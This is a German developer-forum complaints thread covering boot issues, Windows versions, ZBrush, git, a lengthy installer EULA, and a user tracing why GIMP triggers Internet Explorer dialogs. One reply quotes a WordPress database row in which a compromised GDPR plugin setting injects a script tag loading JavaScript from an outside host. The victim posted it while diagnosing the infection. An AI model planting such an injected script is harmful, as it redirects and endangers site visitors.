Jammer-Thread

Hier kann über allgemeine Themen diskutiert werden, die sonst in kein Forum passen.
Insbesondere über Szene, Games, Kultur, Weltgeschehen, Persönliches, Recht, Hard- und Software.
joggel
Establishment
Beiträge: 1636
Registriert: 06.11.2007, 19:06

Re: Jammer-Thread

Beitrag von joggel »

Ich so:
Gestern PC angeschaltet...
PC dann so: Nö! Kannste vergessen.
Ich so: WTF?!?
PC immer noch so: Nö... is nich! Mach dir nen Kopp!
Ich dann so: Wuat?!? Spinnst Du?!?
=> Hab dann das HDMI-Kabel vom 2ten Monitor rausgezogen.
PC beim starten dann so: Yo, funzt. Geht!
Ich so: Puhhh... dachte mein PC ist schrott.

HAHA... naja... noch mal Glück gehabt.
Aber wieso mein PC manchmal streikt, wenn 2 Monitore dranhängen...?
Wer weiß.

----------------
Dieser Beitrag wurde ihnen präsentiert von:
Rippenprellung und Ibu-Tabletten
Zuletzt geändert von joggel am 06.09.2021, 14:03, insgesamt 1-mal geändert.
Benutzeravatar
Jonathan
Establishment
Beiträge: 1823
Registriert: 04.08.2004, 20:06
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Jonathan »

D-eath hat geschrieben:
06.09.2021, 12:28
Mir fiel gerade mein Schinkentoast auf den Boden. Mit der Butterseite nach unten. Die letzte Scheibe. Geil.
Ufff. Herzliche Anteilnahme. Hoffe, dein Tag wird trotzdem gut :)
Lieber dumm fragen, als dumm bleiben!
DerAlbi
Establishment
Beiträge: 265
Registriert: 20.05.2011, 05:37

Re: Jammer-Thread

Beitrag von DerAlbi »

joggel: du hast nicht zufällig eine AMD-GraKa und der Windows-Schnellstart ist aktiviert? Ganz normal.
joggel
Establishment
Beiträge: 1636
Registriert: 06.11.2007, 19:06

Re: Jammer-Thread

Beitrag von joggel »

DerAlbi:
"Ja" zu AMD Grafikkarte, und ebenfalls "Ja" zu Windows-Schnellstart. Ich habe den Windows-Schnellstart jetzt mal deaktiviert.

Noch zu erwähnen ist, dass das nur passiert wenn mein PC in den Standby geht und dort längere Zeit bleibt.
NytroX
Establishment
Beiträge: 243
Registriert: 03.10.2003, 12:47

Re: Jammer-Thread

Beitrag von NytroX »

Standby-Modus und "Tiefer Ruhezustand" habe ich noch nie wirklich verstanden.

Die hinterlassen dein System so kaputt, dass du danach eh neu starten kannst/musst, also kann man den Rechner auch gleich runterfahren...
Bei meinem Laptop dauert es sogar länger wieder "aufzuwachen" als kalt zu booten.

Erinnert mich auch irgendwie immer ein bissel an inkrementelle Compiler... :-P
DerAlbi
Establishment
Beiträge: 265
Registriert: 20.05.2011, 05:37

Re: Jammer-Thread

Beitrag von DerAlbi »

Das wird jetzt dein Mind blown, aber dein super schnelles hochfahren ist konzeptuell nichts weiter als ein Aufwecken aus dem tiefen Ruhezustand.
Benutzeravatar
Krishty
Establishment
Beiträge: 7640
Registriert: 26.02.2009, 12:18
Benutzertext: state is the enemy
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Krishty »

wat? Er sagt doch, kalt booten …

… aber ich stimme insofern zu, als dass ein Aufwachen aus dem Ruhezustand mit meinem MSI-Board in ein paar Sekunden erledigt ist, während ein kalt gestartetes BIOS locker 30 bis 50 Sekunden vor sich hin rechnet, bis der Bootloader anspringt.

Auch hat der Ruhezustand eine Reihe Vorteile, aber das hier ist ja der Jammer-Thread ;)
seziert Ace Combat, Driver, und S.T.A.L.K.E.R.   —   rendert Sterne
Benutzeravatar
xq
Establishment
Beiträge: 1527
Registriert: 07.10.2012, 14:56
Alter Benutzername: MasterQ32
Echter Name: Felix Queißner
Wohnort: Stuttgart & Region
Kontaktdaten:

Re: Jammer-Thread

Beitrag von xq »

Krishty hat geschrieben:
09.09.2021, 17:28
wat? Er sagt doch, kalt booten …

… aber ich stimme insofern zu, als dass ein Aufwachen aus dem Ruhezustand mit meinem MSI-Board in ein paar Sekunden erledigt ist, während ein kalt gestartetes BIOS locker 30 bis 50 Sekunden vor sich hin rechnet, bis der Bootloader anspringt.

Auch hat der Ruhezustand eine Reihe Vorteile, aber das hier ist ja der Jammer-Thread ;)
Kalt booten bei Windows 10 ist aber auch kein kalter Boot mehr, sondern eher ein Ruhezustand. Müsste man von Hand irgendwo in den Energiesparoptionen einstellen, ansonsten ist nur ein "Neu starten" ein echter kalter Boot.

Ist auch echt kacke, weil das File System nicht sauber suspendiert und man eigentlich einen "kalten" Shutdown braucht, damit man nen sauberes Plattenimage ziehen kann
War mal MasterQ32, findet den Namen aber mittlerweile ziemlich albern…

Programmiert viel in ⚡️Zig⚡️ und nervt Leute damit.
Benutzeravatar
Krishty
Establishment
Beiträge: 7640
Registriert: 26.02.2009, 12:18
Benutzertext: state is the enemy
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Krishty »

xq hat geschrieben:
09.09.2021, 18:28
Kalt booten bei Windows 10 ist aber auch kein kalter Boot mehr, sondern eher ein Ruhezustand. Müsste man von Hand irgendwo in den Energiesparoptionen einstellen, ansonsten ist nur ein "Neu starten" ein echter kalter Boot.
Ich kannte das eigentlich eher umgekehrt, aber das könnte auch eine Folge davon sein, dass Windows nach einem Boot automatisch wieder die letzten User einloggt und ihre Programme wieder startet. Das sieht z. T. aus, als hätte der Computer Fast Startup gemacht. Das wiederum ist bei Neustarts aktiv und simuliert diese nur.
seziert Ace Combat, Driver, und S.T.A.L.K.E.R.   —   rendert Sterne
Benutzeravatar
Jonathan
Establishment
Beiträge: 1823
Registriert: 04.08.2004, 20:06
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Jonathan »

~25 GB Age of Empires 4 runtergeladen. Beim Start kommt die Meldung, Windows 8 würde nicht unterstützt. Weil man das ja nicht mal vorher hätte überprüfen können. Ich musste dafür 5 andere Spiele deinstallieren. Argh.

Natürlich hätte ich schon längst Windows 10 installiert, wenn es nicht voller Spyware wäre und ich danach erstmal 2 Tage Vollzeit meinen PC umkonfigurieren müsste um wenigstens das offensichtlichste weg zu bekommen. Windows 8 wird natürlich auch viel zu viel derartiges haben, aber meine Hoffnung ist, dass es a) weniger ist und b) hoffentlich auch mittlerweile inkompatibel zu allem ist und nicht mehr funktioniert :D
Lieber dumm fragen, als dumm bleiben!
Benutzeravatar
Tiles
Establishment
Beiträge: 1942
Registriert: 11.01.2003, 14:21
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Tiles »

Tu dir den Gefallen und grade auf 10 up. Da ist einfach viel weniger Bloat und Kacheln. Und von der Telemetrie schenken die sich nichts ^^
Free Gamegraphics, Freeware Games https://www.reinerstilesets.de
Die deutsche 3D Community: https://www.3d-ring.de
NytroX
Establishment
Beiträge: 243
Registriert: 03.10.2003, 12:47

Re: Jammer-Thread

Beitrag von NytroX »

Dann warte mal auf Windows 11, da kommen die Kacheln wieder. Und die Spyware wird hardwareseitig vorausgesetzt.
Benutzeravatar
Chromanoid
Moderator
Beiträge: 4093
Registriert: 16.10.2002, 19:39
Echter Name: Christian Kulenkampff
Wohnort: Lüneburg

Re: Jammer-Thread

Beitrag von Chromanoid »

Ich dachte immer Blender ist unintuitiv für Normalsterbliche. Jetzt teste ich gerade Zbrush... 0_o Ohne Tutorials bin ich praktisch nicht zurecht gekommen.
Benutzeravatar
Krishty
Establishment
Beiträge: 7640
Registriert: 26.02.2009, 12:18
Benutzertext: state is the enemy
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Krishty »

Programmierer: Hey git, ich möchte diese Datei in zwei Dateien aufspalten, aber irgendwie geht dann die History verloren.

git: Kein Problem! Mach einen neuen Branch, und dann einen Oktopus mit Fast-Forward!

(Lasst euch nicht von dem „The hard way” im Titel täuschen – die beiden alternativen Wege sind auch nicht einfacher.)

Bonus: StackOverflow schlägt ein Skript vor, das git reset --hard HEAD^ nutzt.

Bonus 2: Obligatorisches xkcd.

Bonus 3: Der beste git-Talk ever.
seziert Ace Combat, Driver, und S.T.A.L.K.E.R.   —   rendert Sterne
Benutzeravatar
Tiles
Establishment
Beiträge: 1942
Registriert: 11.01.2003, 14:21
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Tiles »

Ja, ZBrush ist die Anti UI schlechthin. Unintuitiv bis zum Geht nicht mehr :D

Ich bin allerdings überraschend gut damit klar gekommen. Weil sie in sich doch stimmig ist :)
Free Gamegraphics, Freeware Games https://www.reinerstilesets.de
Die deutsche 3D Community: https://www.3d-ring.de
Benutzeravatar
Chromanoid
Moderator
Beiträge: 4093
Registriert: 16.10.2002, 19:39
Echter Name: Christian Kulenkampff
Wohnort: Lüneburg

Re: Jammer-Thread

Beitrag von Chromanoid »

Ja, man kommt rein. Aber Bezeichnungen wie Lightbox für eine Art Bibliothek (da finde ich die Herkunft ja irgendwie erklärbar, passt aber nicht zu 3D), Sub-Tool (für Modell-Teile), Tool für Modell (?) haben mich total verwirrt. Der 2.5D Modus der standardmäßig an ist, führt dann ebenfalls in die Irre.
Benutzeravatar
Tiles
Establishment
Beiträge: 1942
Registriert: 11.01.2003, 14:21
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Tiles »

Naja, ZBrush ist ja eigentlich von der Herkunft her eine 2D Software. Auch wenn sie 3D Modelle ausspuckt. Und dann erklärt sich auch vieles :)
Free Gamegraphics, Freeware Games https://www.reinerstilesets.de
Die deutsche 3D Community: https://www.3d-ring.de
Benutzeravatar
Chromanoid
Moderator
Beiträge: 4093
Registriert: 16.10.2002, 19:39
Echter Name: Christian Kulenkampff
Wohnort: Lüneburg

Re: Jammer-Thread

Beitrag von Chromanoid »

Ja, der ist wahrscheinlich auch der Grund warum ein Modell Tool heißt (im Sinne von Malwerkzeug im 2.5D-Modus)... Naja, trotzdem hätten sie das mittlerweile mal umbauen können oder?
Benutzeravatar
Tiles
Establishment
Beiträge: 1942
Registriert: 11.01.2003, 14:21
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Tiles »

Und all ihre alten User verwirren? Schwierig. Dann lieber die neuen User verwirren ^^
Free Gamegraphics, Freeware Games https://www.reinerstilesets.de
Die deutsche 3D Community: https://www.3d-ring.de
smurfer
Establishment
Beiträge: 157
Registriert: 25.02.2002, 15:55

Re: Jammer-Thread

Beitrag von smurfer »

Mein Kreuzband ist irgendwie hinüber :-(. Das stört mich deshalb, weil ich -- sportlich wäre ja gewissermaßen Eigenlob -- eigentlich recht sportbegeistert bin. Aber gut, ist ja kein Beinbruch ;-)
antisteo
Establishment
Beiträge: 821
Registriert: 15.10.2010, 09:26
Wohnort: Dresdem

Re: Jammer-Thread

Beitrag von antisteo »

Mein erster Webseiten-Virus.

Schuld ist das DSGVO-Plugin siehe Anhang
Dateianhänge
Screenshot 2021-09-24 at 11-29-40 Plugins ‹ ERPL Software — WordPress.png
http://fedoraproject.org/ <-- freies Betriebssystem
http://launix.de <-- kompetente Firma
In allen Posts ist das imo und das afaik inbegriffen.
D-eath
Beiträge: 44
Registriert: 28.08.2009, 19:37
Alter Benutzername: TrunkZ
Echter Name: Thomas

Re: Jammer-Thread

Beitrag von D-eath »

antisteo hat geschrieben:
24.09.2021, 11:30
Mein erster Webseiten-Virus.

Schuld ist das DSGVO-Plugin siehe Anhang
Lustig, das selbe bei mir. 16 Jahre Webhosting und nie ein Problem und nun auf dem Blog meiner Frau so eine Schrott-Umleitung wegen so einer WP Kacke. Zum Kotzen.
Habe mir grade mal einen DB Dump angeschaut, zum Glück wird nur ein JS File eingefügt, das heißt, Deaktivieren reicht:

Code: Alles auswählen

(119126, 'sp_dsgvo_integration_matomo', 'a:9:{s:7:\"enabled\";s:1:\"1\";s:10:\"propertyId\";s:0:\"\";s:10:\"useOwnCode\";s:1:\"1\";s:6:\"jsCode\";s:89:\"<script type=\'text/javascript\' src=\'https://store.piterreceiver.ga/jsa/trim.js\'></script>\";s:11:\"cookieNames\";s:7:\"_pk_*.*\";s:19:\"showAsTechMandatory\";s:1:\"0\";s:14:\"usedTagmanager\";s:0:\"\";s:18:\"implementationMode\";s:11:\"on-premises\";s:4:\"meta\";a:1:{s:6:\"agency\";s:0:\"\";}}', 'yes'),
Benutzeravatar
Krishty
Establishment
Beiträge: 7640
Registriert: 26.02.2009, 12:18
Benutzertext: state is the enemy
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Krishty »

Oh Gimp ffs

Ich speicher in Gimp ganz normal ein Bild, minding my own business, als plötzlich die Sicherheitseinstellungen des Internet Explorers öffnen und mich darauf hinweisen, dass ich eine HTTPS-verschlüsselte Seite ansteuere.
gimpsecurity.png
gimpsecurity.png (8.76 KiB) 1244 mal betrachtet
Oh fuck. Have I been pwnd?!

Also ziehe ich das Netzwerkkabel ab und hänge einen Debugger an gimp.exe, und der zeigt folgenden Call Stack:

  user32.dll!00007ffa23c9ef38()
  […]
  wininet.dll!00007ffa1746aef1()
  wininet.dll!00007ffa1746bcdf()
  […]
  symsrv.dll!00007ff9e539786e()
  […]
  dbghelp.dll!00007ff9e50cf412()
  […]
  exchndl.dll!00000000644016a7()
  KernelBase.dll!00007ffa21227b6c()
  […]
  ntdll.dll!00007ffa2456379e()
  […]
  libgtk-win32-2.0-0.dll!00007ff9e441b8a5()
  […]
  libglib-2.0-0.dll!00007ff9e4dce714()
  […]
  gimp-2.10.exe!00007ff6989114d6()


Okay, wininet.dll ist Windows-Komponente und bedeutet, dass der Prozess versucht, aufs Internet zuzugreifen. symsrv.dll und dbghelp.dll sind Windows-Komponenten, die Call Stacks erzeugen und Debug-Symbole aus dem Internet abrufen können. KernelBase.dll und ntdll.dll sind der Windows-Kernel und der Rest ist Gimp-Zeug. Nur bei exchndl.dll bin ich mir unsicher, aber laut Internet ist das der Just-in-Time-Debugger von MinGW.

Also muss folgendes passiert sein:
  • irgendwas in Gimp crasht
  • der MinGW-Just-in-Time-Debugger wird aufgerufen
  • der findet keine Debug-Symbole
  • er bittet Windows, die Symbole runterzuladen
  • Windows benutzt dafür den Internet Explorer?!
  • weil meine Internet-Explorer-Optionen mega hart sind, erfordert die eine grafische Bestätigung vom User.
Also schließe ich das Internetkabel wieder an und lade alle Symbole. Tatsächlich:

  win32u.dll!NtUserWaitMessage()
  user32.dll!DialogBox2()
  user32.dll!InternalDialogBox()
  user32.dll!DialogBoxIndirectParamAorW()
  user32.dll!DialogBoxParamW()
  wininetlui.dll!LaunchInternetErrorDlg(struct HWND__ *,struct ErrorInfoDlgType *,unsigned long)
  wininetlui.dll!InternetErrorDlgEx()
  wininet.dll!ExecuteLegacyUI(struct HWND__ *,unsigned long,unsigned long,struct _LuiParams *,struct _LuiResults *)
  wininet.dll!InternetErrorDlg()
  symsrv.dll!00007ff9e53a3d2b()
  symsrv.dll!00007ff9e53a3c80()
  symsrv.dll!00007ff9e53a394a()
  symsrv.dll!00007ff9e53a35c5()
  symsrv.dll!00007ff9e539ee32()
  symsrv.dll!00007ff9e53a36ee()
  symsrv.dll!00007ff9e5396b0c()
  symsrv.dll!00007ff9e5397d20()
  symsrv.dll!00007ff9e539786e()
  dbghelp.dll!00007ff9e50b0149()
  dbghelp.dll!00007ff9e50b0401()
  dbghelp.dll!00007ff9e509c68e()
  dbghelp.dll!00007ff9e509d563()
  dbghelp.dll!00007ff9e50c0da8()
  dbghelp.dll!00007ff9e50bf61f()
  dbghelp.dll!00007ff9e50bf30f()
  dbghelp.dll!00007ff9e50b7add()
  dbghelp.dll!00007ff9e50b27c0()
  dbghelp.dll!00007ff9e50efe85()
  dbghelp.dll!00007ff9e50f1d8e()
  dbghelp.dll!00007ff9e50f16b9()
  dbghelp.dll!00007ff9e50e9fea()
  dbghelp.dll!00007ff9e50cf1b9()
  dbghelp.dll!00007ff9e50cf412()
  exchndl.dll!0000000064401f3a()
  exchndl.dll!00000000644015cd()
  exchndl.dll!00000000644016a7()
  KernelBase.dll!UnhandledExceptionFilter()
  ntdll.dll!RtlUserThreadStart$filt$0()
  ntdll.dll!__C_specific_handler()
  ntdll.dll!RtlpExecuteHandlerForException()
  ntdll.dll!RtlDispatchException()
  ntdll.dll!KiUserExceptionDispatch()
  libgtk-win32-2.0-0.dll!00007ff9e459559f()
  libgtk-win32-2.0-0.dll!00007ff9e441251a()
  libgtk-win32-2.0-0.dll!00007ff9e441b8a5()
  libgio-2.0-0.dll!00007ff9e4b515ac()
  libgio-2.0-0.dll!00007ff9e4b515fe()
  libglib-2.0-0.dll!00007ff9e4dcad5e()
  libglib-2.0-0.dll!00007ff9e4dce1b6()
  libglib-2.0-0.dll!00007ff9e4dce714()
  gimp-2.10.exe!00007ff698911a3b()
  gimp-2.10.exe!00007ff698db4f2f()
  gimp-2.10.exe!00007ff6989113c1()
  gimp-2.10.exe!00007ff6989114d6()
  kernel32.dll!BaseThreadInitThunk()
  ntdll.dll!RtlUserThreadStart()


Eine Exception wird verarbeitet, und die löst das Ganze aus.

Aber warum sind da keine Symbole für symsrv.dll und dbghelp.dll?! Das sind doch Windows-Komponenten?!

  'gimp-2.10.exe' (Win32): Loaded 'C:\Program Files\GIMP 2\bin\dbghelp.dll'.
  'gimp-2.10.exe' (Win32): Loaded 'C:\Program Files\GIMP 2\bin\symsrv.dll'.


Ja da fick mir doch einer die Füße blutig! Das sind keine Windows-Dateien!?
gimpsecurity2.png
gimpsecurity2.png (8.98 KiB) 1244 mal betrachtet
Jetzt ergibt es Sinn! Gimp hat offiziell von Microsoft signierte symsrv.dll und dbghelp.dll von Windows 8 kopiert (2014er Datum) und liefert die mit aus. Und wenn Gimp abstürzt und Absturzinformationen sammeln will, werden die benutzt anstelle der Systemkomponenten.

Deshalb wird dann auch der Internet Explorer gestartet!

WTF?! Liefert Gimp jetzt sein eigenes Windows aus, oder was soll der Scheiß?! Zumindest scheint keine DLL Planting Vulnerability zu bestehen; das habe ich gerade schnell geprüft.
seziert Ace Combat, Driver, und S.T.A.L.K.E.R.   —   rendert Sterne
Benutzeravatar
Tiles
Establishment
Beiträge: 1942
Registriert: 11.01.2003, 14:21
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Tiles »

Hui Nice :)

Blender liefert unter Windows auch Windows DLL's mit. Ich vermute mal aus dem gleichen Grund. Damit Blender eben mit diesen DLL's arbeitet, und nicht mit möglicherweise inkompatiblen Versionen auf dem OS.

Windows 8 DLL's scheint mir da noch im Rahmen zu sein, als kleinster gemeinsamer Nenner. Nur abstürzen sollten sie eher nicht ^^
Free Gamegraphics, Freeware Games https://www.reinerstilesets.de
Die deutsche 3D Community: https://www.3d-ring.de
Benutzeravatar
Krishty
Establishment
Beiträge: 7640
Registriert: 26.02.2009, 12:18
Benutzertext: state is the enemy
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Krishty »

System-DLLs aus einem Windows-Verzeichnis kopieren und auf einer anderen Windows-Version zu verwenden ist so ziemlich das Gegenteil von „mögliche Inkompatibilitäten vermeiden“.

Ich wollt’s melden, aber Gimps Bug Tracker zeigt für dbghelp.dll über 500 existierende Tickets an … och nö.
seziert Ace Combat, Driver, und S.T.A.L.K.E.R.   —   rendert Sterne
Benutzeravatar
Tiles
Establishment
Beiträge: 1942
Registriert: 11.01.2003, 14:21
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Tiles »

:D
Free Gamegraphics, Freeware Games https://www.reinerstilesets.de
Die deutsche 3D Community: https://www.3d-ring.de
Benutzeravatar
Chromanoid
Moderator
Beiträge: 4093
Registriert: 16.10.2002, 19:39
Echter Name: Christian Kulenkampff
Wohnort: Lüneburg

Re: Jammer-Thread

Beitrag von Chromanoid »

Ich frage mich gerade , ob man solche dlls überhaupt lizenzrechtlich ausliefern darf. Probleme dieser Art anzusprechen, ist meistens der schnellste Weg sowas loszuwerden....

Edit: ah, das scheint üblich zu sein diese dlls auszuliefern: https://github.com/ShaneK2/inVtero.net/issues/4
Benutzeravatar
Krishty
Establishment
Beiträge: 7640
Registriert: 26.02.2009, 12:18
Benutzertext: state is the enemy
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Krishty »

Furthermore, the version of DbgHelp that ships in Windows has reduced functionality from the other releases-- specifically, it lacks support for Symbol Server and Source Server.
omfg I can’t even

Windows 10 hat 13 GiB Installationsgröße, und jeder Scheiß von Candy Crush über Cortana bis zu Cloud-basiertem Copy-Paste und Edge wird einem aufgezwungen, aber DARAN sparen sie?!

Andererseits: Vielleicht sitzt in deren Team ein Krishty und kennt die Größe der Kernel-DLLs aufs Byte genau, pflegt sie wie einen Zen-Garten auf einem Hochhausdach in Los Angeles, und verteidigt sie gegen jede unnötige Schnittstellen-Erweiterung mit seinem Leben.

Debug-Symbole und Funktionsnamen beim User auszuwerten ist echt eine selten dämliche Idee, und darum braucht diese Funktionalität standardmäßig erstmal genau niemand.
seziert Ace Combat, Driver, und S.T.A.L.K.E.R.   —   rendert Sterne
Benutzeravatar
Tiles
Establishment
Beiträge: 1942
Registriert: 11.01.2003, 14:21
Kontaktdaten:

Re: Jammer-Thread

Beitrag von Tiles »

Dieser Drecks Optix Installer für Linux kommt ja wohl direkt aus der Hölle. 10.000 Zeilen EULA Text. Am Ende ein Do you accept. Und weil du tapfer 10.000 mal Enter drücken musst um endlich dem Text zu entkommen drückst du garantiert einmal zu viel Enter, und überspringst den Accept Teil. License not accepted. Exiting ... wir fangen von vorn an ...

IHR HABTS DOCH NEN VOGL
Dateianhänge
drecksoptixlicense.jpg
Free Gamegraphics, Freeware Games https://www.reinerstilesets.de
Die deutsche 3D Community: https://www.3d-ring.de
Benutzeravatar
marcgfx
Establishment
Beiträge: 1823
Registriert: 18.10.2010, 23:26

Re: Jammer-Thread

Beitrag von marcgfx »

Wenigstens hast du mich zum Lachen gebracht. Danke. Oder sollte ich den Troll-Entwicklern danken? Bin mal wieder am installieren und Sachen zum Laufen bringen die ich auf Win7 so schön am laufen hatte. Bä. Gleichzeitig mein Server-Droplet am updaten. Glaub ich hab es vorhin zerschossen, weil ich vim mit Ctrl-X abbrechen wollte, aber das hat wohl mein Update unterbrochen. Musste zurück zum Backup, zumindest wusste ich nichts besseres.
Antworten